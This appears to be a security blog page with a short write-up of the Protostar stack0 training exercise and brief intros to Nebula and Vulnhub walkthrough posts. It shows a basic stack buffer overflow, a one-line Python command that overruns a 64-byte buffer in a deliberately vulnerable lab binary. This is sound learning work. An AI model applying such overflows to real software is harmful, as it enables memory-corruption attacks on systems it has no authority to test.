Monday, February 27, 2017

Protostar - stack0

This is my first post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


To begin, I run the program to see what's going on:

$ ./stack0

Try again?
$ ./stack0
HI
Try again?
$ 

Okay. Looks like that wasn't what we wanted.

Based off the code, we want to have the program print "you have changed the 'modified' variable". To do this, we need to crash the program.

We have 64 bytes of buffer allocated. If we can send more than 64 bytes, we will change the modified variable from 0 to not 0.

Let's give this a whirl:


$ python -c 'print "A" * 64' | ./stack0
Try again?
$ python -c 'print "A" * 65' | ./stack0
you have changed the 'modified' variable
$ 

Excellent!

Our next attempt will be on stack1.

Thanks for reading!

-geoda





Sunday, February 26, 2017

Nebula - level03

This is my fourth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Saturday, February 25, 2017

Nebula - level02

This is my third post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level01

This is the second post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Nebula - level00

This is my first post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:


Lord of the R00t: Walkthrough

Below is my walkthrough for a VM posted on Vulnhub by KookSec called Lord Of The Root back in 2015.



Sunday, February 12, 2017

Pegasus: 1 - Walkthrough


This vulnhub image is called "Pegasus: 1" and it was created by Knapsy.



I found this VM had the perfect balance of remote and local exploitation. There were definitely times during this where I was slamming my head on the desk confused at what I was doing wrong. Other times, I knew exactly what I needed to do, I just didn't know how to actually accomplish the task. This really brought me back to my OSCP days and the infamous "Try Harder". Like anything, if you don't know how to achieve something, spend time researching and learning; it will eventually pay off!